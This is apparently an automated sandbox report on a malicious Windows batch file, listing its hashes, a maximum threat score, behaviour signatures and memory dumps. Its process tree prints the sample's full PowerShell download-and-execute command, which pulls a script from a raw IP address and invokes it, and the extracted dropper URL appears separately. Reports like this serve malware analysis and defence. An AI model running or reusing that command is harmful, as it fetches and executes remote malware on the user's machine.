Overview

overview

10

Static

static

14a4a3784d...c2.bat

windows7_x64

10

14a4a3784d...c2.bat

windows10_x64

10

Analysis

  • max time kernel
    12s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    31-08-2020 11:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    14a4a3784dbc627e1c40e41285df29c2.bat

  • Size

    214B

  • MD5

    382d73e9001eda598dfc10e833b7742b

  • SHA1

    c732b41c5dc34d1b378fb23cc634cc6ee82774fa

  • SHA256

    4acb6253945b477cb489a9b8adbe3e5dff9f142c7ec942a0a6d4902ccea3ffd7

  • SHA512

    b046949436d9c1f153298971c3140b76f5802be988a2b95dca2f2df6102dfdff7d92f3da0fe6c813a65f2af6abd0a8a2227177f3787252d738e82b2231a121eb

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\14a4a3784dbc627e1c40e41285df29c2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2');Invoke-ZZXMUDC;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:816

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/816-0-0x0000000000000000-mapping.dmp

    Download

  • memory/816-1-0x00000000739A0000-0x000000007408E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/816-2-0x0000000000880000-0x0000000000881000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-3-0x0000000004750000-0x0000000004751000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-4-0x0000000002450000-0x0000000002451000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-5-0x0000000005240000-0x0000000005241000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-8-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-13-0x0000000006080000-0x0000000006081000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-14-0x0000000006220000-0x0000000006221000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-21-0x00000000061F0000-0x00000000061F1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/816-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

    Download